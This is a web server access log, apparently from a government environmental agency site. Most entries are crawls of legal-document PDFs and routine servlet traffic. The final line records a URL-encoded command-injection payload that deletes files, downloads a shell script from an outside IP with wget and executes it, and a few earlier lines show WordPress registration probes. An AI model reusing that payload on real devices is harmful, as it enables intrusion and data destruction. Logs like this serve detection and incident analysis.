201.245.192.253 - - [27/Feb/2024:01:25:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:25:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:01:26:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:01:26:25 -0500] "GET /BLA/resoluciones/AUTOS%202023/0038.pdf HTTP/1.1" 200 411629
172.22.2.4 - - [27/Feb/2024:01:24:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [27/Feb/2024:01:27:05 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [27/Feb/2024:01:27:11 -0500] "GET /BLA/resoluciones/AUTOS%202023/0222.pdf HTTP/1.1" 200 471426
172.22.2.4 - - [27/Feb/2024:01:25:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [27/Feb/2024:01:27:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:01:27:57 -0500] "GET /BLA/resoluciones/AUTOS%202023/0275.pdf HTTP/1.1" 200 378654
201.245.192.253 - - [27/Feb/2024:01:28:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:01:28:38 -0500] "GET /BLA/resoluciones/AUTOS%202023/0643.pdf HTTP/1.1" 200 517508
216.244.66.195 - - [27/Feb/2024:01:29:26 -0500] "GET /BLA/resoluciones/AUTOS%202023/1418.pdf HTTP/1.1" 200 391821
201.245.192.253 - - [27/Feb/2024:01:29:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:29:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39615
201.245.192.253 - - [27/Feb/2024:01:29:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37249
216.244.66.195 - - [27/Feb/2024:01:30:02 -0500] "GET /BLA/resoluciones/AUTOS%202023/1785.pdf HTTP/1.1" 200 387767
201.245.192.253 - - [27/Feb/2024:01:30:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:30:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39940
216.244.66.195 - - [27/Feb/2024:01:30:33 -0500] "GET /BLA/resoluciones/AUTOS%202023/1902.pdf HTTP/1.1" 200 445912
201.245.192.253 - - [27/Feb/2024:01:30:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:01:30:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37249
201.245.192.253 - - [27/Feb/2024:01:31:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:32:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:01:32:05 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:01:30:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.79.97 - - [27/Feb/2024:01:32:53 -0500] "GET /BLA/resoluciones/AUTOS%202008/1412.pdf HTTP/1.1" 200 340105
172.22.2.4 - - [27/Feb/2024:01:31:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [27/Feb/2024:01:33:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:34:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:35:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:35:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
201.245.192.253 - - [27/Feb/2024:01:36:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:36:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [27/Feb/2024:01:37:05 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.96 - - [27/Feb/2024:01:37:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5993.pdf HTTP/1.1" 200 253487
66.249.79.107 - - [27/Feb/2024:01:37:24 -0500] "GET /BLA/resoluciones/Notificaciones/REGISTROS%202023/00241.pdf HTTP/1.1" 304 -
66.249.79.107 - - [27/Feb/2024:01:37:25 -0500] "GET /BLA/resoluciones/AUTOS%202008/1957.pdf HTTP/1.1" 200 87238
40.77.167.78 - - [27/Feb/2024:01:37:38 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-p%C3%A1gina-de-ni%C3%B1os7-50x2.jpg HTTP/1.1" 404 75240
201.245.192.253 - - [27/Feb/2024:01:37:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:01:37:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:38:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:01:36:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:01:38:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
172.22.2.4 - - [27/Feb/2024:01:37:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [27/Feb/2024:01:39:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:39:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39615
201.245.192.253 - - [27/Feb/2024:01:39:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37249
201.245.192.253 - - [27/Feb/2024:01:40:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:40:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39940
157.55.39.223 - - [27/Feb/2024:01:40:55 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [27/Feb/2024:01:40:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37249
40.77.167.235 - - [27/Feb/2024:01:40:59 -0500] "GET /BLA/resoluciones/AUTOS%202023/05840.pdf HTTP/1.1" 200 398670
66.249.79.107 - - [27/Feb/2024:01:41:00 -0500] "GET /BLA/resoluciones/AUTOS%202008/0401.pdf HTTP/1.1" 200 113228
201.245.192.253 - - [27/Feb/2024:01:41:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:42:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:01:42:05 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.246 - - [27/Feb/2024:01:43:37 -0500] "GET /robots.txt HTTP/1.1" 404 1034
201.245.192.253 - - [27/Feb/2024:01:43:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:43:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:01:44:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.79.97 - - [27/Feb/2024:01:44:04 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/x%20restauracion/sitio/55_artic/xtras/10.pdf HTTP/1.1" 404 1018
172.22.2.4 - - [27/Feb/2024:01:42:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
89.185.22.26 - - [27/Feb/2024:01:44:42 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
156.239.49.46 - - [27/Feb/2024:01:44:52 -0500] "GET /portaldeninos/wp-admin/admin-ajax.php HTTP/1.1" 400 1
209.127.76.210 - - [27/Feb/2024:01:44:56 -0500] "GET /portaldeninos/wp-admin/admin-ajax.php?action=register HTTP/1.1" 400 1
172.22.2.4 - - [27/Feb/2024:01:43:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
66.249.79.96 - - [27/Feb/2024:01:45:07 -0500] "GET /resoluciones/RESOLUCIONES%202008/3500.pdf HTTP/1.1" 404 1018
216.244.66.195 - - [27/Feb/2024:01:45:16 -0500] "GET /robots.txt HTTP/1.1" 404 1018
152.61.128.50 - - [27/Feb/2024:01:45:42 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [27/Feb/2024:01:45:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:46:03 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.102.97.30 - - [27/Feb/2024:01:46:15 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+fM63rQACtI5A0jf1MRw6HjGMbx+34Dqk46TeavShD5wfMgYvd53Y0&y=U2FsdGVkX18lXh8wFQXGzJLoyPF57pgG+C4JP/yn6oNrrCe8nFncTBreuAjbxHk9 HTTP/1.1" 200 30
186.102.97.30 - - [27/Feb/2024:01:46:15 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18hx/uYcdC8ku+1wW4vp8QHnudavN0Jt9SMLlpB+/dtGV9lFkVQqvxXF8wqS5XD5hTefrldy0N6malAqtx1LYliD675oeMCVNg=&u=U2FsdGVkX1+E71/qrRdHQLf4MHWhwIBwTk1y8XEsoZo5GK7rhrZ+GqFID31QniwK&y=U2FsdGVkX18lXh8wFQXGzJLoyPF57pgG+C4JP/yn6oNrrCe8nFncTBreuAjbxHk9 HTTP/1.1" 200 97
186.102.97.30 - - [27/Feb/2024:01:46:15 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/CRcbadr9ClpVQlhv9raxHgDkW6nbpsxFf0zwbs+5hBrlZoE1W3a4LqWpoTkxBbj4Tt3tEkvjn8Y2ErUEgZwB8kjgGSMTWcTdVccBj905a/G3xgKWNiIoH/fmUwAZNAzgpCqjd4vgvvaqaLmGJP0WVu4OXlmEglTbDVWXkEMytl/O+YEk4dc32Kl3YfPIWf1FuJBTuA/9/cJIj/2/gk+IEPGO/PopD6W+EOXJIn8Q+PdtbrLvCci0TC9T9GhZxo5ibNsp+ez0Yas+S+DyfVepiJ1jKY68oGuR6D7xHtO01x7tMqsdhQn53FnF3uf7hLfPv0qVkoxcCyXCVws2BRqW90ntsEu9ghl65mTpLvoe0MK1TQ67skyQa0IvjGDLuunbe7YFR4kWeBAaW7TAcuI/7QXEVZGMyVcIiQeKCjOB9oW5ND8NexWaQNEct0HJQ9zsKPZrslmPlnCZM9MBom1SKXe7ypNL+PmWRgt8eYAmBbj8GdJan7E6fuGQDHpF6rXGHHbH5Z5UzAiWUoc4uUdLamKg+54CdVc2HRhR5dE1G9WZKEmeQIchKEJyDDKyLcDg2ou16GAt7UhXbnzmfujIqdCteI5ql0bB904092jkC84shZKqw4jUH9euO4VATZN0QU7ZUuPzZ71MiP1DkqNW2TRxLzobvg/VGRvT7MTOIuaCQeye6xaZgIiTahRB6yrHmavyT3FSXtEvS4ORUs927AZip0Bek3U5jlUU9PzpPbqA11hBAedO1VATMdd/CzfVGMdFwWGmjqk/KM+6N3zKHXFUH1CO2LoSnW4jxxdjofJi7INtNR8u2JvACIviRCHF+h4pKVmcojX7GSfPRCwsZ31U9cELDTemj/UUtn+jgWH1WCuNfodrF8VCsm9cf0IJ2dOknx+v6fQutTATyo5HmQ8n0xjYhnDjlw7MVUm0/QEu9mYxWIFnLKtrDADB15UQfROcYpoQNFUdvUDHrr8yoMKPtu2+aYb7sG+UqHXSZNS28uPmn5EicRQ4dmDxwTzknkCaQwxYO0sp6e0YKTLv0PJUbQ55dOwl2oaHnXl9LgzPpJev2ocXwmhWoKHze2EyRA4Pd7/B7IKLa1Q0s1Xg5U4K0ph1LKMYvRTT70LzZTBl0WYZ2b1DI/1Qo2itI+P8qPlz3vHAXMyLHXOKyTmvFN8yADxS2iRdus9ZdJfFOooan58G1cgFw80F7cvo+1Ux69/+VKpAmJDynAWHefDlBC+098v9ghH5YvcjFLZspGvXtz3VZuo4M//9IMycGv5vUk7Dklqtc5ecoxNEGNAMx3Vw20GeQrVy5/5qUVMdbJ1j3Paz7d3KEONTHb1YfVh8R5o1axqKlt25qzh3EAI0UyIlPoTejP2FBkT5YGgKcypnZNcwxSaA6yJOd6fbhH1Pyqm3zEtDTBYB0TyJnP+M5czmHDLqZc4eq6F38KY+47kWjK2BihT9ZnrexYHpnlohMqOOz6A2eJrvI2WsUm1vWwsNChRVz+VtWQjP+0mcrFaQh0C6TDfCD5ex7eTEqDfuQeNI7qzwu9dMUUv6qb5nOcIQx2mjrFRv0LfSGEniEhxlL17q4ynvgm7DUBrTG7Uh73qFZScJYgh/HC9ZkRfpSZ7UHA8TIsbHJPOtBDeJXrZEkBiWAb51sgvohhUuHbe8tapsP/MUzjln3D4jqVHTg+oXwkOxQeca1qFc+6nWW+n9Ur9JqF4v7J9A8PloY10SEcxlkX+QONHzknGywUsnR73j4dw2TIeVkF/bV5TfjqqcVazGdJcAT&u=U2FsdGVkX1+E71/qrRdHQLf4MHWhwIBwTk1y8XEsoZo5GK7rhrZ+GqFID31QniwK&y=U2FsdGVkX18lXh8wFQXGzJLoyPF57pgG+C4JP/yn6oNrrCe8nFncTBreuAjbxHk9 HTTP/1.1" 200 1374
186.102.97.30 - - [27/Feb/2024:01:46:15 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/eYQ4RYpt3yeaYz2fn7rhehzIbj+ckbH8/jV0RYr3eKHNMfD9a7oaHVcwOfUlV0mI2clMSUkz5amCiHXXRFtkfDn3eoTEc7oFJAUcvAJfH8gU8z3qZ3c6m3+Phf+eh7baaFnIRJ71Oh44V1w2d2/B1lyUVoyUbzXiADgUYNN/FL+Gaj7VgGmDdwVp379n+Yh126Zh51lfdD61nm0pAraWJQMKukPdeig0HGHhq1f4jEaaj1tlmfNbnbn2Clp4AX5/vmxGJE4lFyp4cXqdfcCUR7XP95p+unvReNBB6DZYDH7xF7ziI4OzkRB9Mn6TylNWcEBO3OGrnYc/zR90cnidQCyS9JiPBQIuWtHxUcOsRwYr6405pspOm+QVTzosqO+cekJU1qH3BI0A8NiAQKsaI/shUCLkpjCiHZuBfFAk/VNYLUOj5XPy4TDIDlpbRYMIpyf8A/bVpMuhVoPyJYZIFeqmeEay6/YNt9A7yLoz4LIKiHeJaV63Iu/udcc2eCc0y77Y81SZaCXfQktSJj8dDAQWXQZo8btgVlLdCOy+loFkRZJFN9YWtNa66dNOxqa/szxSGsBY4REhb0W+3rDorL8BwSRioT16waV/p8sYpnGDWluKooIl3d//nBto5Qm4NWc7z62ZVKxySZqUKep0DPRJpJfdNE3jN53OZTmtgXFz3TDdsw3iSDPViog1WbbexDvYUlDYcbnZ4NJlNJIqnmPGZzIbAkZrrgrCv5ceVUSdvRhK8EMJa&u=U2FsdGVkX1+E71/qrRdHQLf4MHWhwIBwTk1y8XEsoZo5GK7rhrZ+GqFID31QniwK&y=U2FsdGVkX18lXh8wFQXGzJLoyPF57pgG+C4JP/yn6oNrrCe8nFncTBreuAjbxHk9 HTTP/1.1" 200 208
186.102.97.30 - - [27/Feb/2024:01:46:15 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+fM63rQACtI5A0jf1MRw6HjGMbx+34Dqk46TeavShD5wfMgYvd53Y0 HTTP/1.1" 200 30244
98.64.96.27 - - [27/Feb/2024:01:46:53 -0500] "GET /BLA/boletinlegal/Circulares/024/CIRCULAR%20No.%2000002%20DEL%2031%20DE%20ENERO%20DEL%202024.pdf HTTP/1.1" 404 1018
216.245.221.92 - - [27/Feb/2024:01:47:05 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:01:47:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:48:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:48:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
172.22.2.4 - - [27/Feb/2024:01:48:44 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2003%20del%2024%20de%20Febrero%20de%202017.pdf HTTP/1.1" 200 6911517
201.245.192.253 - - [27/Feb/2024:01:49:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:01:48:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:01:50:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:01:49:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
27.115.124.41 - - [27/Feb/2024:01:51:08 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
27.115.124.40 - - [27/Feb/2024:01:51:09 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
27.115.124.34 - - [27/Feb/2024:01:51:09 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
27.115.124.40 - - [27/Feb/2024:01:51:07 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
27.115.124.49 - - [27/Feb/2024:01:51:09 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
27.115.124.49 - - [27/Feb/2024:01:51:09 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
27.115.124.40 - - [27/Feb/2024:01:51:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
27.115.124.49 - - [27/Feb/2024:01:51:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
27.115.124.40 - - [27/Feb/2024:01:51:09 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
27.115.124.41 - - [27/Feb/2024:01:51:09 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
27.115.124.49 - - [27/Feb/2024:01:51:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
27.115.124.49 - - [27/Feb/2024:01:51:11 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/css/site.min.css?ver=1.8.14 HTTP/1.1" 200 8260
27.115.124.49 - - [27/Feb/2024:01:51:11 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
27.115.124.40 - - [27/Feb/2024:01:51:11 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
27.115.124.34 - - [27/Feb/2024:01:51:09 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
27.115.124.41 - - [27/Feb/2024:01:51:11 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
27.115.124.40 - - [27/Feb/2024:01:51:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
27.115.124.49 - - [27/Feb/2024:01:51:11 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
27.115.124.49 - - [27/Feb/2024:01:51:11 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
27.115.124.40 - - [27/Feb/2024:01:51:11 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
27.115.124.49 - - [27/Feb/2024:01:51:12 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
27.115.124.40 - - [27/Feb/2024:01:51:12 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
27.115.124.41 - - [27/Feb/2024:01:51:12 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
27.115.124.40 - - [27/Feb/2024:01:51:12 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
27.115.124.40 - - [27/Feb/2024:01:51:12 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
27.115.124.49 - - [27/Feb/2024:01:51:12 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
27.115.124.40 - - [27/Feb/2024:01:51:13 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
27.115.124.49 - - [27/Feb/2024:01:51:12 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
27.115.124.41 - - [27/Feb/2024:01:51:13 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4 HTTP/1.1" 200 6527
27.115.124.40 - - [27/Feb/2024:01:51:13 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
27.115.124.40 - - [27/Feb/2024:01:51:13 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
27.115.124.34 - - [27/Feb/2024:01:51:12 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
27.115.124.49 - - [27/Feb/2024:01:51:13 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
27.115.124.49 - - [27/Feb/2024:01:51:13 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/js/site.min.js?defer&ver=1.8.14 HTTP/1.1" 200 48457
201.245.192.253 - - [27/Feb/2024:01:51:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:01:52:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:01:52:05 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.97 - - [27/Feb/2024:01:53:24 -0500] "GET /resoluciones/RESOLUCIONES%202007/RES%202007%203901%20AL%204000/RESOLUCION%203984%20DE%202007.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [27/Feb/2024:01:53:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:01:53:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.246 - - [27/Feb/2024:01:53:51 -0500] "GET /secretaria-de-ambiente-firma-dos-nuevos-pagos-por-servicios-ambientales-que-permitiran-conservar-36-hectareas-en-usme.html HTTP/1.1" 200 1048
66.249.79.97 - - [27/Feb/2024:01:54:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/2334.pdf HTTP/1.1" 200 374582
201.245.192.253 - - [27/Feb/2024:01:54:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.32 - - [27/Feb/2024:01:54:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4576.pdf HTTP/1.1" 304 -
66.249.66.37 - - [27/Feb/2024:01:55:40 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
172.22.2.4 - - [27/Feb/2024:01:55:42 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
